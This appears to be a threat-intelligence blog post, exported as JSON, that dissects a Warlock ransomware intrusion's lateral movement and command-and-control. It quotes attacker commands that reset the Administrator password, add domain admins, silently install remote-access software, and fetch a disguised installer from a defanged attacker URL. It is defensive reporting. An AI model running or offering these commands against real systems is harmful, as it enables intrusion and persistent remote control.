{"id":60320,"date":"2026-03-16T00:00:00","date_gmt":"2026-03-16T00:00:00","guid":{"rendered":"urn:uuid:993ee1ab-f64f-4d2d-1ead-a7e3a1ecdadf"},"modified":"2026-03-16T00:00:00","modified_gmt":"2026-03-16T00:00:00","slug":"web-shells-tunnels-and-ransomware-dissecting-a-warlock-attack","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/web-shells-tunnels-and-ransomware-dissecting-a-warlock-attack\/","title":{"rendered":"Web Shells, Tunnels, and Ransomware: Dissecting a Warlock Attack"},"content":{"rendered":"

<\/p>\n

<\/div>\n

Following initial access, the threat actors conducted extensive lateral movement using a combination of legitimate administration tools and credential abuse. As a result, the  threat actors gained control of the DC, reset the password of the built-in Administrator account, and subsequently added a domain user to the Domain Administrators group, indicating full domain-level compromise.<\/p>\n

net user administrator <REDACTED>
net localgroup Administrators “<REDACTED>\\Desktop Admins” \/ADD<\/span><\/p>\n

PsExec<\/b><\/p>\n

Lateral movement activity involving PsExec was observed through the execution of the PSEXESVC process and the presence of the artifact C:\\Windows\\PSEXEC<REDACTED>.key<\/i>. This step was consistent with remote command executions across the domain. Aside from the PsExec, several tools were used as secondary options for remote monitoring and control over the devices.<\/p>\n

TightVNC<\/b><\/p>\n

PsExec was used to execute commands that led to the installation of TightVNC via MSIEXEC execution with \/i<\/i>, enabling the download and installation of package from the remote location.<\/p>\n

C:\\windows\\system32\\msiexec.exe \/i hxxps[:\/\/www[.tightvnc[.com\/download\/2.8.85\/tightvnc-2.8.85-gpl-setup-64bit[.msi \/q \/norestart ADDLOCAL=Server SERVER_REGISTER_AS_SERVICE=1 SERVER_ADD_FIREWALL_EXCEPTION=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=[REDACTED]  <\/span><\/p>\n

PowerShell Remoting (PSRemoting)<\/b><\/p>\n

Furthermore, PSRemoting, a built-in Windows feature for remote administration, was enabled and used to execute PowerShell commands on remote systems. <\/p>\n

C:\\windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe “Enable-PSRemoting -Force -SkipNetworkProfileCheck”  <\/span><\/p>\n

RDP Patcher\/Wrapper<\/b><\/p>\n

RDP Patcher enables the non-server Windows edition to have concurrent RDP sessions. Multiple sessions are allowed; thus, administrators are less likely to notice or disconnect an existing session preventing any detections.<\/p>\n

Command-and-control<\/span><\/h2>\n

Tunneling mechanisms, C&C agents and several other tools were used to maintain persistence of the  threat actors and facilitate their communications within the private network.<\/p>\n

Velociraptor<\/b><\/p>\n

The  threat actors continued to abuse Velociraptor (version 0.73.4) as their primary C&C framework, repurposing the legitimate Digital Forensics and Incident Response (DFIR) tool for stealth. This activity is part of a consistent pattern of abusing dual-use tools, as previously documented by external researchers, wherein the group’s infrastructure has evolved from Velociraptor to include VS Code and Cloudflare Tunnel for C&C communications.<\/p>\n

The Velociraptor installer was disguised as “v4.msi<\/i>” and hosted on a Supabase storage:<\/p>\n

C:\\Windows\\System32\\msiexec.exe \/q \/i hxxps[:\/\/]vdfccjpnedujhrzscjtq[.]supabase[.]co\/storage\/v1\/object\/public\/image\/v4[.]msi<\/span><\/p>\n

VS Code<\/b><\/p>\n

Following installation, Velociraptor downloaded VS Code using an encoded PowerShell command: <\/p>\n

[“Invoke-WebRequest -Uri \\”https:\/\/vscode.download.prss.microsoft.com\/dbazure\/download\/insider\/09401e712d4ffa5e497787978fe90c1557a0092b\/vscode_cli_win32_x64_cli.zip\\” -OutFile \\”C:\\\\ProgramData\\\\Microsoft\\\\AppV\\\\code.zip\\”\\n”]<\/span><\/p>\n

We observed three related PowerShell executions through Velociraptor, all following the same fileless execution pattern:<\/p>\n